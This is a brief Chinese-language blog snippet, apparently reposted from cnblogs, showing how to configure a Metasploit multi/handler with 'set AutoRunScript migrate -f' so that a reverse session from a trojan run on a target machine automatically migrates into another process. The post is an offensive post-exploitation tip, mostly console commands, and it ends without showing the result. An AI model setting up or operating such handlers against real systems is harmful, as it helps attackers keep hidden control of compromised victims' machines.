metasploit实现反弹上线自动迁移进程

msf5 exploit(multi/handler) > show advanced

AutoRunScript   migrate -f   no   A script to run automatically on session creation.
    
msf5 exploit(multi/handler) > set AutoRunScript migrate -f

目标机运行木马

msf中自动迁移:

猜你喜欢

转载自www.cnblogs.com/zpchcbd/p/11729530.html